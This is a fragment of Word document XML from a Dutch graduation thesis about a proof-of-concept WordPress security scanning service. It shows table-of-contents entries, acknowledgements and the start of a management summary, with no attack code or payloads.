        <w:p w14:paraId="54365F11" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292471" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Glossary</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292471 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44E9EC29" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292472" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ERD MODEL</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292472 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D15CAB1" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292473" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Workflow</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292473 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>86</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="280DD46D" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292474" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Klassen Diagrammen</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292474 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>87</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="359B1132" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292475" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OWASP Definities</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292475 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18EF7C77" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292476" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Projectstructuur</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292476 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="368697C7" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292477" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL injectie voorbeeld</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292477 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6479901F" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292478" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS voorbeelden</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292478 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="269AE582" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292479" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL onderzoek</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292479 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A65B90F" w14:textId="77777777" w:rsidR="00950076" w:rsidRDefault="004652B4" w:rsidP="00EF3E0F">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:sectPr w:rsidR="00950076" w:rsidSect="00241096">
              <w:footerReference w:type="even" r:id="rId17"/>
              <w:footerReference w:type="default" r:id="rId18"/>
              <w:headerReference w:type="first" r:id="rId19"/>
              <w:footerReference w:type="first" r:id="rId20"/>
              <w:pgSz w:w="11906" w:h="16838"/>
              <w:pgMar w:top="0" w:right="1417" w:bottom="0" w:left="1417" w:header="0" w:footer="708" w:gutter="0"/>
              <w:cols w:space="708"/>
              <w:titlePg/>
              <w:docGrid w:linePitch="360"/>
            </w:sectPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="2FB975FF" w14:textId="5CBBDAAF" w:rsidR="00A248C1" w:rsidRDefault="00133264" w:rsidP="00EF3E0F">
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253254656" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09290974" wp14:editId="5DDB32F7">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>-903605</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>-608330</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3D537" id="Rectangle 517" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.15pt;margin-top:-47.85pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0B786569" w14:textId="79200710" w:rsidR="00594BF5" w:rsidRDefault="00594BF5"/>
    <w:p w14:paraId="70054A69" w14:textId="5016CD99" w:rsidR="00594BF5" w:rsidRDefault="00594BF5" w:rsidP="00594BF5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc496292409"/>
      <w:r>
        <w:t>Voorwoord</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4841A4D7" w14:textId="6B3171CB"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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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2BA35792" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:r>
                              <w:t>Hierbij wil ik graag mijn bedrijfsbegeleider Pim Ruiter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0E3238" w:rsidRDefault="000E3238">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A6A"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2BA35792" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t xml:space="preserve">Hierbij wil ik graag mijn bedrijfsbegeleider Pim Ruiter bedanken voor zijn begeleiding en steun tijdens mijn afstudeertraject. Hij heeft altijd het vertrouwen in mij en in het afstudeerproject gehad. Ook wil ik mijn collega’s bedanken voor hun steun en toeverlaat wanneer ik het nodig had. Niek, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Rakhal</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">, Manon, Bob, Jordy, Roy, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Estée</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>, Mitchel, Leo en Lonneke, bedankt!</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30348D86" w14:textId="7B1699DA" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t xml:space="preserve">Ik wil mijn stagebegeleider Gerlof </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Donga</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> bedanken voor zijn begeleiding en bereidheid om mij te helpen wanneer ik het nodig had tijdens mijn afstudeertraject. Ook wil ik </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Salahdinn</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> El </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Kawakibi</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t xml:space="preserve">Hierbij presenteer ik aan jullie de scriptie “SecurityReport </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Proof</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">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0E3238" w:rsidRPr="00B23545" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00B23545" w:rsidRDefault="000E3238"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 xml:space="preserve">ohamed El </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Kawakibi</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0044790A">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="1" w:name="_Toc496292410"/>
    <w:p w14:paraId="5983CC64" w14:textId="1904E0BF"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5B6B63F1">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D4CB0"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bookmarkEnd w:id="1"/>
    </w:p>
    <w:bookmarkStart w:id="2" w:name="_Toc496292411"/>
    <w:p w14:paraId="437D588E" w14:textId="5CBFEF0A" w:rsidR="00A248C1" w:rsidRDefault="000D7903" w:rsidP="00A248C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>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F103965" w:rsidR="000E3238" w:rsidRPr="00142053" w:rsidRDefault="000E3238">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F103965" w:rsidR="000E3238" w:rsidRPr="00142053" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00142053">
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Het bedrijf S5 specialiseert zich in het ontwikkelen van website in het CMS </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00142053">
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t>Wordpress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00142053">
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t>.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t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t>Wordpress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> websites hun website online kunnen laten scannen. Dit met als doel om </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t>Wordpress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> gebruikers en daarmee ook hun klanten meer inzicht te bieden in de security status van hun website. S5 vroeg mij om een concreet concept te ontwikkelen en daar een </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t>Proof</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> of Concept van te maken door een </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t>Minimal</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t>Viable</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserv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23CA24BB" w:rsidR="000E3238" w:rsidRDefault="000E3238">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23CA24BB" w:rsidR="000E3238" w:rsidRDefault="000E3238">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1C7F56">
        <w:t>Management</w:t>
      </w:r>
      <w:r w:rsidR="00A248C1">
        <w:t>samenvatting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>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0E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>De hoofdvraag die ik binnen dit afstudeerproject zal beantwoorden luidt:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="36702ADE" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="520BE022" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="08294A50" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E323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0E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>De hoofdvraag die ik binnen dit afstudeerproject zal beantwoorden luidt:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="36702ADE" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="520BE022" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="08294A50" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="26612AC0" w14:textId="114763FE" w:rsidR="00A248C1" w:rsidRDefault="000D7903" w:rsidP="00A248C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253179904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4081F05E" wp14:editId="6F348126">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546C1FEB" w:rsidR="000E3238" w:rsidRDefault="000E3238">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5"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9Hw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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
